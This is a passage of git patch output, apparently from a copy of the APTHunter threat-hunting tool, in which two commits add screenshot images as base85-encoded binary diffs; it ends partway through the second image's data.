NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational -- 2.34.1 From c967070926bad56d1b83187d714f17837c130e41 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:44:31 +0800 Subject: [PATCH 09/13] ADD file via upload --- source/screenshot/APTHunter-Allreport.png | Bin 0 -> 10343 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Allreport.png 
diff --git a/source/screenshot/APTHunter-Allreport.png b/source/screenshot/APTHunter-Allreport.png new file mode 100644 index 0000000000000000000000000000000000000000..225ecf5631a1b18969f639b7ae9de17b9c748ca6 GIT binary patch literal 10343 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
  • @W4W^UBvXm&%K;4IJ}2ZdjTqbIW1nyjvP`*ywb<3|{_hJd4Qq;MKC4%7cGK?Yri0RmIQbx&o~z56=WR3To2*Qf092ma09d2UO; z-_dXJ?O-wBRe}_QC8Ty4$=m%Pa+zYt6h97ET!E}d;KsH)QM`AV=@$Dv(1>GpV4n1uMXU_+a+Zx!nJA$+6F0@i!|7Z6)? z?54Q^a3f6$zzKS;rcS;c-e#Nw{XU~%9;J=$j-5+geC*}*<1MY;TNvc)eE~WjmLwOA z)>o`fTs5);>)lyS$zSEoNVFU1YU7vmWKu7AMOGzwYF!;n79(=LGrBny~9gr!Q?%N_IDxQ2hZBL-zfCg=zw6~5#nVNOns(wY>me{}rz?ed7~ zdfCoi2O-t^xk~nn4Dh-tn^s&N5*bOyXa@)bC}(bN!pW<=&?NAI4$4C#r;Sd54R!qg z;$xt31B`>S>Pbj+T}JDNQVu&MRrhv$5%lPxL*XaTep&ra4+(vW0&g||fY@tg3oMb} z5wBKnjI3YpH(fFF-LD-h6m)s|fbHmM^{UIEv!P+AecGX1>EQ^7STFS+8g>oa5n#(N zrgWeI4L-HXyOHGcj|S8O4Nia!0oDI#kVCxSJ~rz_*agQucwLgiOQ8HxIU|0+Z%KLa zUeDp!zxdHy3j zoAAgw@gLz(edjfye}%tZ|8L&R>HnMP(4qfZy8p6{FaKu@2kY?vpD`@#9~t%fQHn9T ScmJP#GBL2YUwija{Qm<~2<2=5 literal 0 HcmV?d00001 -- 2.34.1 From bbf070f892586759478e0bfdb0de9d58fd88a6d5 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:44:53 +0800 Subject: [PATCH 10/13] ADD file via upload --- source/screenshot/APTHunter-Excel.png | Bin 0 -> 242189 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Excel.png 
diff --git a/source/screenshot/APTHunter-Excel.png b/source/screenshot/APTHunter-Excel.png new file mode 100644 index 0000000000000000000000000000000000000000..4db713f45601aa2cd91898dafbe4b88f7b6b01f5 GIT binary patch literal 242189 zcmc$_byQqmvo;7Jfh1UfAdLohZCsOJ!GpWI1a~L62X{z9aCg_nr6D-MX(U)9jY~6x z{NDF|ckZ2;JO6xNt;J%U(`W78T~)i}spo`$l$S(*N%#^00Rdg=gP0Nm0+KHR!qbT7 z$PafAqg#_6{ylYiFQxMQLA;-vggsmXoW(VqmF>)&-3%Q~5zKAvKAAE*89SPq+B#X- zIUgc*2qPf8L68!Ar{bQuzvSjEcLC`?o^84?i;%@OYN#hrt&!Lll2&Y?Q|#bo&apu5w^6MteqDDFleMwzRf7=(l?F~M@^A%aX z0LEZpV;f9X+fTJIH7W3JnzjpNIXC4}>NJ$oZDbEnlfV44UT`W&d5& zGV^oJKc5$@(o&qLG=tl7guj~hdYecehLnV|zT-Pl{;maVKFt}`>xbCtV~;3D745_r z63m^Pn}{;`Cnz&Y!q)r|(Fk~BT(-GzKZtGkX`}VeM&+5qq=QUg{llZU3itc3%YMdn zP1f7bTs1DBC}^*kdM%>A!iu{wb#ye7WZ=meQtTgL1DF>(xG0sM@_7m5oDqhjM@Kj6}Xv&94D*#u!HMzO-q#ftt2{g$p}Y5hUr z+oW!kInwF7^b{wx4#aDnSSU2ewx$b{HKwZ4BKq-;TviR(xRMoM;5Onz;N_K$-H9G&4{?z#!vfwgOPE*Oy?)b2I
  • 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 